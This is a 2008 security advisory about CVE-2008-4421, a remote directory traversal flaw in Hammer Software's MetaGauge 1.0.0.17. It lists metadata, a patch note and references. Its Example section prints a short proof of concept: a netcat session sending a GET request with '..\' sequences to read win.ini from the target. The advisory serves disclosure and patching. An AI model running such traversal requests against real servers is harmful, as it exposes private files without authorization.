Topic : | MetaGauge 1.0.0.17 Directory Traversal
|
SecurityAlert : 4360
CVE : CVE-2008-4421
CWE : CWE-22
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : brad antoniewicz
Published : 09.10.2008
Affected Software : | hammer-software:metagauge:1.0.0.17
hammer-software:metagauge:1.0.0.20 and previous versions |
 Advisory Content : Title: MetaGauge 1.0.0.17 Directory Traversal
-------------------------------------------------------------
Vendor: Hammer Software
Vendor URL: www.Hammer-Software.com
Vendor Response: Vendor has been notified and has since addressed the issue
in the latest software release.
Description:
A directory traversal vulnerability exists in MetaGauge version 1.0.0.17
(and potentially below) which allows a remote user to view files local to
the target server.
Example:
C:\> nc targethost 2004
GET /..\..\..\..\..\..\winnt\win.ini HTTP/1.1
Patch Information:
Hammer has addressed the issue in the latest version of MetaGauge:
http://dl.hammer-software.com/metagauge.zip
CVE: CVE-2008-4421
Credit:
Brad Antoniewicz
brad.antoniewicz (at) foundstone (dot) com [email concealed]
References :
http://securityreason.com/expldownload/1/4850/1 (Exploit)
http://www.securityfocus.com/bid/31596
http://www.securityfocus.com/archive/1/archive/1/497039/100/0/threaded
http://www.milw0rm.com/exploits/6686
http://www.frsirt.com/english/advisories/2008/2747
http://secunia.com/advisories/32094
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|